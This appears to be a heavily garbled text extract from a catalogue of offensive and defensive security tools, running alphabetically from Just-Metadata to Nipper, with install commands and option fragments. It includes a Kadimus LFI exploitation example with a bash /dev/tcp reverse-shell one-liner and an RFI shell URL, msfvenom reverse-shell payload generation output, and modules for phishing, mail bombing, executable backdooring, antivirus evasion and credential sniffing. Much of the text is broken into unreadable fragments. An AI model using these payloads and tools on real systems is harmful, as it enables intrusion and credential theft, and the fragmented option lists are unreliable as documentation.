webshell commands, Configuration backup, Update
checker.
0.2 Time based algorithm, Multi-thread control (start
pause resume stop), Shows URL calls.
Ideally, you should be able to run the setup script, and it will
install everything you need.
For the Shodan information gathering module, YOU WILL
NEED a Shodan API key. This costs like $9 bucks, come on
now, it's worth it :).
Usage
DownloadJust-Metadata
KADIMUS - LFI SCAN & EXPLOIT TOOL
Compile:
Installing libcurl:
CentOS/Fedora
# yum install libcurl-devel
Debian based
Installing libpcre:
CentOS/Fedora
Debian based
Installing libssh:
CentOS/Fedora
# yum install libssh-devel
Debian based
And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make
Options:
-h, --help
Request:
-B, --cookie STRING
header
-A, --user-agent STRING
User-Agent to send to
server
--connect-timeout SECONDS
connection
--retry-times NUMBER
if connection fails
--proxy STRING
protocol://hostname:port
Scanner:
-u, --url STRING
scan
results
--threads NUMBER
Number of threads
(2..1000)
Explotation:
-t, --target STRING
Vulnerable Target to
exploit
--injec-at STRING
exploit
(only need with RCE data
and source disclosure)
RCE:
-X, --rce-technique=TECH
use
execute, with php brackets
-c, --cmd STRING
connection.
-l, --listen NUMBER
port to listen
-b, --bind-shell
shell
-i, --connect-to STRING
Ip/Hostname to connect
--ssh-port NUMBER
proc/self/environ
input
php://input
auth
var/log/auth.log
data
data://text
Source Disclosure:
-G, --get-source
using filter://
-f, --filename STRING
source [REQUIRED]
-O FILE
stdout)
Examples:
Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout
10 --retry-times 0
Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c
'ls -lah' --ssh-target localhost
You can also check for RFI errors, just put the remote url on
resource/common_files.txt and the regex to identify this,
example:
/* http://bad-url.com/shell.txt */ <?php echo
base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU=
"); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here
Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at
pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345
0>&1' --retry-times 0
Download Kadimus
KALI LINUX 1.1.0 - THE BEST PENETRATION TESTING
DISTRIBUTION
DISTRIBUTION
So, whats new in Kali 2.0? Theres a new 4.0 kernel, now
based on Debian Jessie, improved hardware and wireless
drivercoverage, support for a variety of Desktop Environments
(gnome, kde, xfce, mate, e17, lxde, i3wm), updated desktop
environment and tools and the list goes on.
Kali Linux is Now a Rolling Distribution
One of the biggest moves weve taken to keep Kali 2.0 up-todatein a global, continuous manner, is transforming Kali into
a rolling distribution. What this means is that we are pulling
our packages continuously fromDebian Testing
(aftermakingsure that all packages areinstallable)
essentially upgrading the Kali core system, while allowing us to
Through our Live Build process, Kali 2.0 now natively supports
KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. Weve
moved on to GNOME 3 in this release, marking the end of a
long abstinence period. Weve finally embraced GNOME 3 and
with a few custom changes, its grown to be our favourite
desktop environment. Weve added custom support for multilevel menus, true terminal transparency, as well as a handful of
useful gnome shell extensions. This however has come at a
price the minimum RAM requirements for a full GNOME 3
session has increased to 768 MB. This is a non-issue on
modern hardware but can be detrimental on lower-end
machines. For this reason, we have also released an official,
minimal Kali 2.0 ISO. This light flavour of Kali includes a
handful of useful tools together with the lightweight Xfce
desktop environment a perfect solution for resource-
constrained computers.
Kali Linux 2.0 ARM Images &NetHunter 2.0
The whole ARM image section has been updated across the
board with Kali 2.0 including Raspberry Pi, Chromebooks,
Odroids The whole lot! In the process, weve added some
new images such as the latest Chromebook Flip the little
beauty here on the right. Go ahead, click on the image, take a
closer look. Another helpful change weve implemented in our
ARM images is including kernel sources, for easier compilation
of new drivers.
We havent forgotten about NetHunter, our favourite mobile
penetration testing platform which also got an update and
nowincludes Kali 2.0. With this, wevereleased a whole
barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10.
The OnePlus One NetHunter image has also been updated to
Kali 2.0 and now has a much awaited image for CM12 as well
check the Offensive Security NetHunter page for more
information.
UpdatedVMwareandVirtualBox Images
Yes, you can upgrade Kali 1.x toKali 2.0!To do this, you will
need to edit your source.list entries, and run a dist-upgrade as
shown below.If you have been using incorrect or extraneous
Kali repositories or otherwise manually installed or overwritten
Kali packages outside of apt, your upgrade to Kali 2.0 may
fail.This includes scripts like lazykali.sh, PTF, manual git
clones in incorrect directories, etc. All of these will clobber
existing files on the filesystem and result in a failed upgrade. If
this is the case for you, youre better off reinstalling your OS
from scratch.
Otherwise, feel free to:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates
main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot
MAIN FILES
--core
Setting.py
design.py
Errors.py
ping.py
--- Funcitons
--scripts
__init__.py
REQUIREMENTS
OS requirement:
Kali Linux
INSTALLATION
Installation of Katana framework:
git clone https://github.com/RedToor/katana.git
cd Katana
chmod 777 install.py
python install.py
USAGE COMMANDS
Stable
---------------------------------------------------------
--------./sudo ktf.console
98%
Builded - Enabled
./sudo ktf.run -m net/arpspoof
95%
Builded - Enabled
Building
--------------------------------------------------------------ktf.lab
30%
Builded - No yet.
ktf.linker -m web/whois -t google.com -p 80
80%
Builded - No yet.
MODULES (SCRIPTS)
Code Name
Description
Autor
Versi
on
web/httpbt
Redtoor
1.0
web/formbt
Redtoor
1.0
web/
cpfinder
Redtoor
1.0
web/
joomscan
Redtoor
1.0
web/dos
Redtoor
1.0
web/whois
Who-is web
Redtoor
1.0
net/
arpspoof
ARP-Spoofing attack
Redtoor
1.0
net/arplook
ARP-Spoofing
detector
cl34r
1.0
net/
portscan
Port Scanner
RedToor
1.0
set/
gdreport
Getting information
with web
RedToor
3.0
set/
mailboom
E-mail boombing
SPAM
RedToor
3.0
set/
facebrok
facebook phishing
plataform
RedToor
1.7
fle/brutezip
LeSZO
ZerO
1.0
fle/bruterar
LeSZO
ZerO
1.0
clt/ftp
Redtoor
1.0
clt/sql
Redtoor
1.0
clt/pop3
Redtoor
1.0
clt/ftp
Redtoor
1.0
ser/sql
Redtoor
1.0
ser/apache
Redtoor
1.0
ser/ssh
Redtoor
1.0
fbt/ftp
Redtoor
1.0
fbt/ssh
Redtoor
1.0
fbt/sql
Redtoor
1.0
fbt/pop3
Redtoor
1.0
LINKS
Project in SF : http://sourceforge.net/projects/katanas/
files/
Documentation: https://github.com/RedToor/Katana/tree/
master/doc
Blog of project[ES]: http://cave-rt.blogspot.com.co/
2015/07/instalacion-y-uso-katana-framework.html
Download Katana
KATOOLIN - AUTOMATICALLY INSTALL ALL KALI LINUX
TOOLS
Requirements
Python 2.7
An operating system (tested on Ubuntu)
Instalation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp
katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
Video
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Usage
DownloadKatoolin
KEEFARCE - EXTRACTS PASSWORDS FROM A KEEPASS
2.X DATABASE, DIRECTLY FROM MEMORY
Download KeeFarce
KEYBOX - A WEB-BASED SSH CONSOLE THAT
CENTRALLY MANAGES ADMINISTRATIVE ACCESS TO
SYSTEMS
for Windows
set JAVA_HOME=C:\path\to\jdk
set PATH=%JAVA_HOME%\bin;%PATH%
Start KeyBox
for Linux/Unix/OSX
./startKeyBox.sh
for Windows
startKeyBox.bat
Steps:
1. Create systems
2. Create profiles
3. Assign systems to profile
4. Assign profiles to users
5. Users can login to create sessions on assigned systems
6. Start a composite SSH session or create and execute a
script across multiple sessions
7. Add additional public keys to systems
8. Disable any adminstrative public key forcing key rotation.
9. Audit session history
DownloadKeyBox
KING PHISHER - PHISHING CAMPAIGN TOOLKIT
DownloadKing Phisher
KUNAI - PWNING & INFO GATHERING VIA USER
BROWSER
Example configs
DownloadKunai
LIME - LINUX MEMORY EXTRACTOR
Usage
format=<raw|padded|lime> [dio=<0|1>]"
path (required):
Examples
In this example we use adb to load LiME and then start it with
acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"
Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime
format=lime"
Download Lime
LINSET - WPA/WPA2 HACK WITHOUT BRUTE FORCE
How it works
DownloadLINSET
LMD - LINUX MALWARE DETECT
Linux Malware Detect (LMD) is a malware scanner for Linux
released under the GNU GPLv2 license, that is designed
around the threats faced in shared hosted environments. It
uses threat data from network edge intrusion detection systems
to extract malware that is actively being used in attacks and
generates signatures for detection. In addition, threat data is
also derived from user submissions with the LMD checkout
feature and from malware community resources. The
signatures that LMD uses are MD5 file hashes and HEX pattern
matches, they are also easily exported to any number of
detection tools such as ClamAV.
The driving force behind LMD is that there is currently limited
availability of open source/restriction free tools for Linux
systems that focus on malware detection and more important
Using the Team Cymru malware hash registry, we can see that
of the 8,883 malware hashes shipping with LMD 1.5, there was
6,931 or 78% of threats that went undetected by 30 commercial
anti-virus and malware products. The 1,951 threats that were
detected had an average detection rate of 58% with a low and
high detection rate of 10% and 100% respectively. There could
not be a clearer statement to the need for an open and
community driven malware remediation project that focuses on
the threat landscape of multi-user shared environments.
Features:
or FILE
kernel inotify monitor convenience feature to monitor
system users
kernel inotify monitor can be restricted to a configurable
user html root
kernel inotify monitor with dynamic sysctl limits for optimal
performance
kernel inotify alerting through daily and/or optional weekly
reports
e-mail alert reporting after every scan execution (manual
& daily)
path, extension and signature based ignore options
background scanner option for unattended scan
operations
verbose logging & output of all actions
Source Data:
The LMD signature are updated typically once per day or more
frequently depending on incoming threat data from the LMD
checkout feature, IPS malware extraction and other sources.
The updating of signatures in LMD installations is performed
daily through the default cron.daily script with the update
option, which can be run manually at any time.
An RSS feed is available for tracking malware threat updates:
http://www.rfxn.com/api/lmd
Detected Threats:
perl.ircbot.xscan
bin.dccserv.irsexxy
perl.mailer.yellsoft
bin.fakeproc.Xnuxer
perl.shell.cbLorD
bin.ircbot.nbot
perl.shell.cgitelnet
bin.ircbot.php3
php.cmdshell.c100
bin.ircbot.unclassed
php.cmdshell.c99
bin.pktflood.ABC123
php.cmdshell.cih
bin.pktflood.osf
php.cmdshell.egyspider
bin.trojan.linuxsmalli
php.cmdshell.fx29
c.ircbot.tsunami
php.cmdshell.ItsmYarD
exp.linux.rstb
php.cmdshell.Ketemu
exp.linux.unclassed
php.cmdshell.N3tshell
exp.setuid0.unclassed
php.cmdshell.r57
gzbase64.inject
php.cmdshell.unclassed
html.phishing.auc61
php.defash.buno
html.phishing.hsbc
php.exe.globals
perl.connback.DataCha0s
php.include.remote
perl.connback.N2
php.ircbot.InsideTeam
perl.cpanel.cpwrap
php.ircbot.lolwut
perl.ircbot.atrixteam
php.ircbot.sniper
perl.ircbot.bRuNo
php.ircbot.vj_denie
perl.ircbot.Clx
php.mailer.10hack
perl.ircbot.devil
php.mailer.bombam
perl.ircbot.fx29
php.mailer.PostMan
perl.ircbot.magnum
php.phishing.AliKay
perl.ircbot.oldwolf
php.phishing.mrbrain
perl.ircbot.putr4XtReme
php.phishing.ReZulT
perl.ircbot.rafflesia
php.pktflood.oey
perl.ircbot.UberCracker
php.shell.rc99
perl.ircbot.xdh
php.shell.shellcomm
Real-Time Monitoring:
Download LMD
LOKI - SCANNER FOR SIMPLE INDICATORS OF
COMPROMISE
Reports
-p path
Path to scan
-s kilobyte
--noprocscan
--nofilescan
--noindicator
--debug
Debug output
Download Loki
LUKS-OPS - AUTOMATE THE USAGE OF LUKS VOLUMES
IN LINUX
Default Options:
DownloadLUKS-OPs
LYNIS 2.0.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS
Privileged or non-privileged
DownloadLynis 2.0.0
LYNIS 2.1.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS
The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).
How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
During the scan, technical details about the scan are stored in a
log file. At the same time findings (warnings, suggestions, data
collection), are stored in a report file.
Opportunistic scanning
Many other tools use the same data files for performing tests.
OpenVAS / Nessus
These products focus primarily on vulnerability scanning. They
do this via the network by polling services. Optionally they will
log in to a system and gather data.
Differences with OpenVAS / Nessus
Lynis runs on the host itself, therefore it can perform a deeper
analysis compared with network based scans. Additionally,
there is no risk for your business processes, and log files
remain clean from connection attempts and incorrect requests.
Although Lynis is an auditing tool, it will actually discover
vulnerabilities as well. It does so by using existing tools and
analyzing configuration files.
Lynis and OpenVAS are both open source and free to use.
Nessus is a closed source and paid.
Benefits of Lynis
Much faster
No pollution of log files, no disruption to business services
Host based scans provides more in-depth audit
Changelog
Lynis 2.1.0
= Lynis 2.1.0 (2015-04-16) =
General:
AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others
It even runs on systems like the Raspberry Pi and several
storage devices!
No installation required
The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).
How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
Many other tools use the same data files for performing tests.
Since Lynis is not limited to a few common Linux distributions, it
uses tests from standards and many custom ones not found in
any other tool.
Best practices
CIS
NIST
NSA
OpenSCAP data
Vendor guides and recommendations (e.g. Debian
Gentoo, Red Hat)
Parameters
--auditor "Given name Surname"
-c
--check-update
--cronjob
--help
-h
--manpage
--nocolors
--pentest
privileged)
--quick
-Q
--quiet
doesn't wait)
--reverse-colors
lighter backgrounds
--version
-V
Changelog
Lynis 2.1.1
=
-------------------------------------------------------------
libarchive-dev
Mac OS X
For compiling Malheur on Mac OS X a working installation of
Xcode is required including gcc. Additionally, the following
packages need to be installed via Homebrew
libconfig
libarchive (from homebrew-alt)
OpenBSD
For compiling Malheur on OpenBSD the following packages are
required. Note that you need to use gmake instead of make for
building Malheur.
gmake
libconfig
libarchive
$ make
$ make check
$ make install
installation
DownloadMALHEUR
MALIGNO V2.0 - METASPLOIT PAYLOAD SERVER
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
DownloadMaligno v2.0
MALWARE - MALWARE REPOSITORY FRAMEWORK
DownloadMalwaRE
MASSBLEED - MASS SSL VULNERABILITY SCANNER
USAGE
ABOUT
This script has four main functions with the ability to proxy all
connections:
1. To mass scan any CIDR range for OpenSSL
vulnerabilities via port 443/tcp (https) (example: sh
massbleed.sh 192.168.0.0/16)
2. To scan any CIDR range for OpenSSL vulnerabilities via
any custom port specified (example: sh massbleed.sh
192.168.0.0/16 port 8443)
3. To individual scan every port (1-10000) on a single system
for vulnerable versions of OpenSSL (example: sh
massbleed.sh 127.0.0.1 single)
4. To scan every open port on every host in a single class C
subnet for OpenSSL vulnerabilities (example: sh
massbleed.sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via
proxychains. You'll need to configure /etc/proxychains.conf for
this to work.
PROXY USAGE EXAMPLES: (example: sh massbleed.sh
192.168.0.0/16 0 0 proxy) (example: sh massbleed.sh
192.168.0.0/16 port 8443 proxy) (example: sh massbleed.sh
127.0.0.1 single 0 proxy) (example: sh massbleed.sh
192.168.0. subnet 0 proxy)
VULNERABILITIES:
1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
3. Poodle SSLv3 vulnerability (CVE-2014-3566)
DownloadMassBleed
this application:
Thread-based parallel testing. Brute-force testing can be
performed against multiple hosts, users or passwords
concurrently.
Flexible user input. Target information (host/user/
password) can be specified in a variety of ways. For
example, each item can be either a single entry or a file
containing multiple entries. Additionally, a combination file
format allows the user to refine their target listing.
Modular design. Each service module exists as an
independent .mod file. This means that no modifications
are necessary to the core application in order to extend
the supported list of services for brute-forcing.
Why?
AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RDP
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware Authentication Daemon (vmauthd)
VNC
Generic Wrapper
Web Form
News
DownloadMedusa
METASPLOIT AV EVASION - METASPLOIT PAYLOAD
GENERATOR THAT AVOIDS MOST ANTI-VIRUS
PRODUCTS
DownloadMetasploit AV Evasion
MICENUM - MANDATORY INTEGRITY CONTROL
ENUMERATOR FOR WINDOWS
Download MicEnum
MITMF - FRAMEWORK FOR MAN-IN-THE-MIDDLE
ATTACKS
connected clients
Screenshotter - Uses HTML5 Canvas to render an
accurate screenshot of a clients browser
Responder - LLMNR, NBT-NS, WPAD and MDNS
poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP spoofing, ICMP
redirects or DHCP spoofing
BeEFAutorun - Autoruns BeEF modules based on a
client's OS or browser type
AppCachePoison - Perform app cache poisoning attacks
Ferret-NG - Transperently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser
plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables sent over HTTP using
the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with
out-of-date browser plugins
webpages
Replace - Replace arbitary content in HTML content
SMBAuth - Evoke SMB challenge-response authentication
attempts
Upsidedownternet - Flips images 180 degrees
Installation
If MITMf is not in your distro's repo or you just want the latest
version:
Run the command git clone https://github.com/
byt3bl33d3r/MITMf.git to clone this directory
Run the setup.sh script
Run the command pip install --upgrade -r
requirements.txt to install all Python dependencies
On Kali Linux, if you get an error while installing the pypcap
package or when starting MITMf you see: ImportError: no
module named pcap, run apt-get install python-pypcap to
fix it
DownloadMITMf
MOBAXTERM - TERMINAL FOR WINDOWS WITH X11
SERVER, TABBED SSH CLIENT, NETWORK TOOLS AND
MUCH MORE...
application for your remote tasks, e.g. when you use SSH to
connect to a remote server, a graphical SFTP browser will
automatically pop up in order to directly edit your remote files.
Your remote applications will also display seamlessly on your
Windows desktop using the embedded X server.
You can download and use MobaXterm Home Edition for free.
If you want to use it inside your company, you should consider
subscribing to MobaXterm Professional Edition: this will give
you access to much more features, professional support and
"Customizer" software.
When developing MobaXterm, we focused on a simple aim:
proposing an intuitive user interface in order for you to
efficiently access remote servers through different networks
or systems.
Key features
system.
Tcl / Tk / Expect: Tcl is a simple-to-learn yet very powerful
language. Tk is its graphical toolkit. Expect is an automation
tool for terminal.
X11Fonts: Complete set of fonts for X11 server.
X3270Suite: IBM 3270 terminal emulator for Windows.
XServers: Xephyr, Xnest, Xdmx, Xvfb and Xfake alternate X11
servers.
Xmllint: A command line XML tool.
Xorg (legacy): The old X11 (Xorg v1.6.5) server: use this
plugin if you have trouble connecting to an old Unix station
through XDMCP.
Zip: Zip compression utility.
DownloadMobaXterm
MOBSF (MOBILE SECURITY FRAMEWORK) - MOBILE
(ANDROID/IOS) AUTOMATED PEN-TESTING FRAMEWORK
https://github.com/ajinabraham/Mobile-SecurityFramework-MobSF/wiki/Documentation
Queries
v0.8.7 Changelog
Improved Static Analysis Rules
Better AndroidManifest View
Search in Files
v0.8.6 Changelog
Detects implicitly exported component from manifest.
Added CFR decompiler support
Fixed Regex DoS on URL Regex
v0.8.5 Changelog
Bug Fix to support IPA MIME Type: application/x-itunesipa
v0.8.4 Changelog
Improved Android Static Code Analysis speed (2X
performance)
Static Code analysis on Dexguard protected APK.
Fixed a Security Issue - Email Regex DoS.
Added Logging Code.
All Browser Support.
MIME Type Bug fix to Support IE.
Fixed Progress Bar.
v0.8.3 Changelog
View AndroidManifest.xml & Info.plist
Credits
Download Mobile-Security-Framework-Mobsf
MOSCA - STATIC ANALYSIS TOOL TO FIND BUGS
Just another Simple static analysis tool to find bugs like a grep
unix command, at mosca have a modules, that was call egg,
each egg is a simple config to find bug at especific language
like PHP,Ruby,ASP etc... Example of egg config at directory
"egg", If Mosca read a line with vunerability of egg in source
code, then, mosca have alert about vulnerability and save at
logs.
Download Mosca
MPC - MSFVENOM PAYLOAD CREATOR
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/
mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc
Help
root@kali:~# mpc -h -v
[*] Msfvenom Payload Creator (MPC v1.3)
[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/
MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/
HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
[i]
+ ASP
[i]
+ ASPX
[i]
+ Bash [.sh]
[i]
+ Java [.jsp]
[i]
+ Linux [.elf]
[i]
+ OSX [.macho]
[i]
+ Perl [.pl]
[i]
+ PHP
[i]
+ Powershell [.ps1]
[i]
+ Python [.py]
[i]
+ Tomcat [.war]
[i]
+ Windows [.exe]
https://www.offensive-
security.com/metasploit-unleashed/payload-types/
[i]
https://www.offensive-
security.com/metasploit-unleashed/payloads/
[i] <TCP> is the standard method to connecting back.
This is the most compatible with TYPES as its RAW. Can be
easily detected on IDSs.
[i] <HTTP> makes the communication appear to be HTTP
traffic (unencrypted). Helpful for packet inspection,
which limit port access on protocol - e.g. TCP 80.
[i] <HTTPS> makes the communication appear to be
(encrypted) HTTP traffic using as SSL. Helpful for packet
inspection, which limit port access on protocol - e.g.
TCP 443.
[i] <FIND_PORT> will attempt every port on the target
IP: 192.168.1.10
(msfconsole -q -r /root/
windows-meterpreter-staged-reverse-tcp-443-exe.rc)
[?] Quick web server for file transfer?
python -m
SimpleHTTPServer 8080
[*] Done!
root@kali:~#
IP: 192.168.103.238
(msfconsole -q -r /root/linux-shell-
staged-reverse-tcp-4444-elf.rc)
[?] Quick web server for file transfer?
SimpleHTTPServer 8080
[*] Done!
root@kali:~#
python -m
[i]
[i]
[i]
4.) lo - 127.0.0.1
[i]
IP: 10.10.100.63
[i]
PORT: 443
[i]
[i]
SHELL: shell
STAGE: stageless
METHOD: tcp
[i]
MD5: 53452eafafe21bff94e6c4621525165b
(msfconsole -q -r /root/python-
shell-stageless-reverse-tcp-443-py.rc)
[?] Quick web server for file transfer?
python -m
SimpleHTTPServer 8080
[*] Done!
root@kali:~#
To-Do List
Shellcode generation
x64 payloads
IPv6 support
Look into using OS scripting more (powershell_bind_tcp
& bind_perl etc)
Login Password
Database Schema
MySQL Port
MySQL Host/Server Address
URLs visited
POST loads sent
HTTP form logins/passwords
HTTP basic auth logins/passwords
HTTP searches
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
NTLMv1/v2 all supported protocols like HTTP, SMB,
LDAP, etc
Kerberos
Examples
DownloadNet-creds
NETOOL.SH - MITM PENTESTING OPENSOURCE T00LKIT
netool.sh toolkit provides a fast and easy way For new arrivals
to IT security pentesting and also to experience users to use
allmost all features that the Man-In-The-Middle can provide
under local lan, since scanning, sniffing and social engeneering
attacks "[spear phishing attacks]"...
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
DESCRIPTION
Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' -exploit-get ?0x27 -s report.log --comand-vul 'nmap -Pn -p
1-8080 --script http-enum --open _TARGET_'
Operative Systems Supported
"TOOLKIT DEPENDENCIES"
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet |
Apache2 | sslstrip
"SCANNER INURLBR.php"
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl
* Install zenity | Install nmap | Install ettercap | Install
macchanger | Install metasploit | Install Apache2 *
Features (modules)
"1-Show Local Connections"
"2-Nmap Scanner menu"
->
Ping target
Show my Ip address
See/change mac address
change my PC hostname
Scan Local network
Scan external lan for hosts
Scan a list of targets (list.txt)
Scan remote host for vulns
Execute Nmap command
Screenshots
Downloadnetool.sh
NETRIPPER - SMART TRAFFIC SNIFFING FOR
PENETRATION TESTERS
files
netripper.rb
Command line
Injection: NetRipper.exe DLLpath.dll processname.exe
Example:
Generate DLL:
-h,
--help
-w,
--write
configuration data
-l,
--location
(default TEMP)
Plugins:
-p,
--plaintext
--datalimit
true
-d,
E.g. 4096
-s,
--stringfinder
user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096
-s user,pass
Metasploit module
msf > use post/windows/gather/netripper
msf post(netripper) > show options
Module options (post/windows/gather/netripper):
Name
Required
Current Setting
Description
-----------
-------------------------
DATALIMIT
4096
no
TEMP
no
PLAINTEXT
true
no
no
no
yes
user,login,pass,database,config
no
1. cp netripper.rb /usr/share/metasploit-framework/modules/
post/windows/gather/netripper.rb
2. mkdir /usr/share/metasploit-framework/modules/post/
windows/gather/netripper
3. g++ -Wall netripper.cpp -o netripper
4. cp netripper /usr/share/metasploit-framework/modules/
post/windows/gather/netripper/netripper
5. cd ../Release
6. cp DLL.dll /usr/share/metasploit-framework/modules/post/
windows/gather/netripper/DLL.dll
PowerShell module
DownloadNetRipper
NETSPARKER 4 - EASIER TO USE, MORE AUTOMATION
AND MUCH MORE WEB SECURITY CHECKS
This is the first thing you will notice when you launch the new
version of Netsparker Desktop; a more straightforward and
easier to use New Scan dialog. Easy to use software has
become synonymous with Netsparkers scanners and in this
version we raised the bar again, giving the opportunity to many
users to launch web security scans even if they are not that
familiar with web application security.
Once you enter the necessary details, mainly the login form
URL and credentials you can clickVerify Login & Logoutto
verify that the scanner can automatically login and identify a
logged in session, as shown in the below screenshot.
You do not have to record any login macros because the new
mechanism is all based on DOM. You just have to enter the
The above list just highlights the most prominent features and
new security checks of Netsparker Desktop version 4, the only
false positive free web application security scanner. Included in
this version there are also more new security checks and we
also improved several existing security checks, hence the
scanners coverage is better than ever before. Of course we
also included a number of product improvements.
Since there have been a good number of improvements and
changes in this version there are also some things from older
versions of Netsparker which are no longer supported, such as
scan profiles. Because we changed the way Netsparker saves
the scan profiles, scan profiles generated with older versions of
Netsparker will no longer work. Therefore I recommend you to
check the Netsparker Desktop version 4 changelog for more
information on what is new, changed and improved.
EASY
You can add multiple users with different privileges to the same
Netsparker Cloud account, thus allowing everyone in the
organization to easily collaborate and share all the findings to
streamline the process of securing web applications.
CORRELATED TRENDING REPORTS HELP YOU KEEP
TRACK OF WEB APPLICATION PROJECTS
Web applications are constantly evolving; new features,
functionality and improvements are the order of the day to
ensure they continuously meet all business requirements.
Though such changes also open up new security issues.
Netsparker Cloud security dashboard allows you to easily keep
an eye on the state of security of all web applications while the
trending reports will help you keep track of the quality of work
your developers are doing. Trending reports can also help you
monitor who is improving so you can better assign tasks
according to each of the developers skills.
Basic usage
Options:
-ask+
submitting updates
yes
no
auto
(default)
send
-Cgidirs+
-Display+
Show redirects
Show cookies
Debug output
Print progress to
received
responses
require authentication
errors
STDOUT
and hostnames
V
-dbcheck
Verbose output
Encoding technique:
1
Directory self-
Fake parameter
TAB as request
Use Windows
Use a carriage
(non-UTF8)
reference (/./)
string
spacer
the URL
directory separator (\)
return (0x0d) as a request spacer
B
Comma-separated-
htm
HTML Format
msf+
Log to Metasploit
nbe
txt
Plain text
value
xml
XML Format
-host+
Target host
-IgnoreCode
responses
-id+
-list-plugins
perform no testing
-maxtime+
-mutate+
Attempt to brute
Attempt to guess
-nointeractive
-nolookup
-nossl
-no404
for auto-name)
-Pause+
integer or float)
-Plugins+
(default: ALL)
-port+
-RSAcert+
-root+
-Tuning+
Scan tuning:
1
Interesting File /
Misconfiguration /
Information
Injection (XSS/
Remote File
Denial of Service
Remote File
Seen in logs
Default File
Disclosure
Script/HTML)
Retrieval - Inside Web Root
Command Execution /
SQL Injection
File Upload
Authentication
Software
Remote Source
Reverse Tuning
Remote Shell
Bypass
Identification
Inclusion
Options (i.e., include all except specified)
-timeout+
10 seconds)
-Userdbs
duration
-update
from CIRT.net
-useproxy
nikto.conf
-Version
versions
-vhost+
+ requires a value
Basic Testing
To check on a different port, specify the port number with the p (-port) option. This will scan the IP 192.168.0.1 on TCP port
443:
perl nikto.pl -h 192.168.0.1 -p 443
test more than one port on the same host, specify the list of
ports in the -p (-port) option. Ports can be specified as a
range (i.e., 80-90), or as a comma-delimited list, (i.e.,
80,88,90). This will scan the host on ports 80, 88 and 443.
perl nikto.pl -h 192.168.0.1 -p 80,88,443
DownloadNikto2
NIPE - SCRIPT TO REDIRECT ALL TRAFFIC FROM THE
MACHINE TO THE TOR NETWORK
Script to redirect all the traffic from the machine to the Tor
network.
[+] AUTOR:
Vinicius Gouvea
[+] EMAIL:
vini@inploit.com
[+] BLOG:
https://medium.com/viniciusgouvea
[+] GITHUB:
https://github.com/HeitorG
[+] FACEBOOK:
https://fb.com/viniciushgouvea
Installing:
Commands:
COMMAND
FUNCTION
install
For install.
start
To start
stop
To stop
Tested on:
Ubuntu 14.10 and 15.04
Busen Labs Hydrogen
Debian Jessie 8.1 and Wheezy 7.9
Lubuntu 15.04
Xubuntu 15.04
LionSec 3.0
Download Nipe
NIPPER - TOOLKIT WEB SCAN FOR ANDROID
IP Server
CMS Detect & Version
DNS Lookup
Nmap ports IP SERVER
Enumeration Users
Enumeration Plugins
Find Exploit Core CMS
Find Exploit DB
CloudFlare Resolver
Nipper NO requiere ROOT, tan solo requiere permiso a
internet.
Compatible desde 2.3 a Android L.
